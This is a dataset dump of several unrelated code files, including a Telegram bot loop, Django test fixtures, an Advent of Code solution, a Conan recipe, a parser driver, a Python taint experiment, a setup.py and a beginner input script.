for plugin in utilities.plugins:
if "cron" in plugin and plugin["name"] == data["name"]:
return_values = await plugin["cron"](data)
for return_value in return_values:
if return_value:
try:
await (return_value)
except Exception as e:
print("clock local :" + str(e))
utilities.crons.remove(data)
await asyncio.sleep(1)
if "updateChat" in utilities.config:
loop.create_task(
utilities.client.send_message(
utilities.config["updateChat"], "The bot restart successfully."
)
)
del utilities.config["updateChat"]
utilities.save_config()
loop.create_task(clock())
loop.create_task(saveBotId())
utilities.prCyan("Started Receveving Messages ...")
utilities.client.run_until_disconnected()
| StarcoderdataPython |
11242061 | import pytest
from django.test import Client
class AccountObjects:
def __init__(self, handle):
from django.contrib.auth import get_user_model
from rest_framework.test import APIClient
from fullctl.django.auth import permissions
from fullctl.django.models import Organization, OrganizationUser
self.user = user = get_user_model().objects.create_user(
username=f"user_{handle}",
email=f"{handle}@localhost",
password="<PASSWORD>",
first_name=f"user_{handle}",
last_name="last_name",
)
self.other_user = get_user_model().objects.create_user(
username=f"other_user_{handle}",
email=f"other_{handle}@localhost",
password="<PASSWORD>",
first_name=f"other_user_{handle}",
last_name="last_name",
)
self.orgs = Organization.sync(
[
{"id": 1, "name": f"ORG{handle}", "slug": handle, "personal": True},
{
"id": 2,
"name": f"ORG{handle}-2",
"slug": f"{handle}-2",
"personal": False,
},
],
user,
None,
)
# add permissions
user.grainy_permissions.add_permission(self.orgs[0], "crud")
user.grainy_permissions.add_permission(self.orgs[1], "r")
self.org = self.orgs[0]
OrganizationUser.objects.create(org=self.org, user=self.other_user)
self.other_org = Organization.objects.create(
name="Other",
slug="other",
id=3,
)
self.api_client = APIClient()
self.api_client.login(username=user.username, password="<PASSWORD>")
self.client = Client()
self.client.login(username=user.username, password="<PASSWORD>")
self.perms = permissions(user)
def make_account_objects(handle="test"):
return AccountObjects(handle)
@pytest.fixture
def dj_client_anon():
return Client()
@pytest.fixture
def dj_account_objects():
return make_account_objects()
@pytest.fixture
def dj_account_objects_b():
return make_account_objects("test_b")
| StarcoderdataPython |
3405543 | <reponame>aapalo/aoc2020<filename>1/code.py
#!/usr/bin/python3
#from collections import Counter
#import re
#import os
import time
#from collections import defaultdict
#from collections import deque
''' ####### '''
date = 1
dev = 0 # extra prints
part = 3 # 1,2, or 3 for both
samp = 0 # 0 or 1
''' ####### '''
def day(te):
i = 0
j = 0
listlen = len(te)
while i < listlen:
while j < listlen:
if i != j:
if te[i] + te[j] == 2020:
return (te[i] * te[j])
j += 1
i += 1
j = 0
print(te)
return 0
def day2(te):
i = 0
listlen = len(te)
while i < listlen:
j = 0
while j < listlen:
k = 0
while k < listlen:
if (i != j) and (j != k) and (i != k):
if te[i] + te[j] + te[k] == 2020:
print(te[i], te[j], te[k])
return (te[i] * te[j] * te[k])
k += 1
j += 1
i += 1
print(te)
return 0
''' ####### '''
time0 = time.time()
if samp == 1:
filename = "/sample.txt"
else:
filename = "/input.txt"
try:
with open(str(date) + filename,"r") as f:
t = f.readlines()
except FileNotFoundError:
with open("." + filename,"r") as f:
t = f.readlines()
t = [(x.strip().replace(' ',' ')) for x in t]
t = [int(x) for x in t] #str to int
if part == 1:
print("Part 1: ", day(t))
elif part == 2:
print("Part 2: ", day2(t))
elif part == 3:
#run both
print("Part 1: ", day(t))
print("Part 2: ", day2(t))
tdif = time.time() - time0
print("Elapsed time: {:.4f} s".format(tdif))
| StarcoderdataPython |
6559236 | from conans import ConanFile, CMake, tools
class FoobarConan(ConanFile):
name = "foobar"
version = "0.1.0"
license = "MIT"
settings = "os", "compiler", "build_type", "arch"
options = {"shared": [True, False], "installer": ["deb", "rpm", "tgz", "zip"]}
default_options = "shared=False", "installer=deb"
generators = "cmake"
exports_sources = "src/*", "include/*", "CMakeLists.txt"
exports = "LICENSE"
def build(self):
cmake = CMake(self)
cmake.configure()
cmake.build()
cmake.install()
self.run("cpack -G %s %s" % (str(self.options.installer).upper(), self.build_folder))
def package(self):
self.copy("LICENSE", dst="license")
installer = "%s-%s.%s" % (self.name, self.version, ("tar.gz" if self.options.installer == "tgz" else str(self.options.installer)))
self.copy(installer, dst="install")
def package_info(self):
self.cpp_info.libs = tools.collect_libs(self)
| StarcoderdataPython |
277084 | #!/usr/bin/python3
import argparse
import os
import sys
from src.util import Util
from src.step2.program import Program, ProgramRegex
from src.LR0Parser import LR0Parser
from src.grammar import Grammar
from src.log import Log
import re
if __name__ == '__main__':
grammar = Grammar.from_lines(Util.get_lines_filename('src/step2/grammar.rg'))
print(str(grammar))
program = Program()
program.scan('src/step2/code.ry')
# print(program.get_pif(), '\n')
print(program)
# program_regex = ProgramRegex()
# program_regex.scan('src/step2/code.ry')
parser = LR0Parser(grammar, program)
config = parser.parse(program.get_pif())
if config is not None:
print("Sequence: accepted!")
print(program.get_code())
print("Output stack: ", config.output_stack)
parser.print_productions_list()
Log.success("ACCEPT")
# parser = argparse.ArgumentParser()
# parser.add_argument('file', help="The source program file")
# args = parser.parse_args()
# if os.path.exists(args.file):
# Log.info('Scanning file {0}\n'.format(args.file))
# program = Program()
# program.scan(args.file)
# print(program)
# else:
# Log.error('File "{0}" does not exist.'.format(args.file))
| StarcoderdataPython |
3571879 | #!/home/nickolai/python/taint-2.6/python
import os
import sys
class Taint:
def __init__(self, *l):
self.l = []
self.l.extend(l)
def merge(self, other):
n = Taint()
n.l.extend(self.l)
n.l.extend(other.l)
return n
def export_check(self, f):
pass
def pt(s):
print s
print s.__taint__.l
x = "abc".taint(Taint(5))
y = "def".taint(Taint(6))
z = "ghi".taint(Taint(7))
x2 = "abc".taint(Taint(105))
y2 = "def".taint(Taint(106))
z2 = "ghi".taint(Taint(107))
pt(x+y)
pt(x2+y)
pt(x+z)
pt(x+z2)
a=x+y+z
pt(a)
b=x+y
c=b+z
pt(c)
| StarcoderdataPython |
3339780 | <gh_stars>1-10
from setuptools import setup, find_packages
with open("README.md") as f:
readme = f.read()
with open("gym/__init__.py") as f:
for line in f:
if line.startswith("__version__"):
version = line.split('"')[1]
setup(
name="gym",
version="0.3.0",
description="Gym - VNF Testing Framework",
long_description=readme,
long_description_content_type="text/markdown",
author="<NAME>",
packages=find_packages(exclude=("tests",)),
namespace_packages=["gym"],
include_package_data=True,
keywords=["gym", "VNF", "test", "benchmark"],
license="Apache License v2.0",
url="https://github.com/raphaelvrosa/gym",
download_url="https://github.com/raphaelvrosa/gym",
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Other Environment",
"Intended Audience :: Developers",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Topic :: Utilities",
"License :: OSI Approved :: Apache Software License",
],
scripts=[
"gym/agent/gym-agent",
"gym/monitor/gym-monitor",
"gym/manager/gym-manager",
"gym/player/gym-player",
"gym/infra/gym-infra",
"gym/cli/gym-cli",
],
install_requires=[
"asyncio<=3.4.3",
"protobuf<=3.12.2",
"grpclib<=0.3.2",
"grpcio-tools<=1.31.0",
"pyang<=2.3.2",
"pyangbind<=0.8.1",
"jinja2<=2.11.2",
"PyYAML<=5.3.1",
"pandas<=1.1.0",
"docker<=4.1.0",
"psutil<=5.7.0",
"paramiko<=2.6.0",
"scp<=0.13.2",
"prompt_toolkit==3.0.6",
"influxdb==5.3.0",
"aiohttp==3.6.2",
],
python_requires=">=3.7",
setup_requires=["setuptools>=41.1.0"],
)
| StarcoderdataPython |
11334787 | print("Hello User")
name = input("What is your name?")
print("Hello " + name + "!")
age1 = input("What is your age?")
if int(age1) > 50:
print("Ah... A well traveled soul are ye.")
else:
print("Awwww you're just a baby")
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.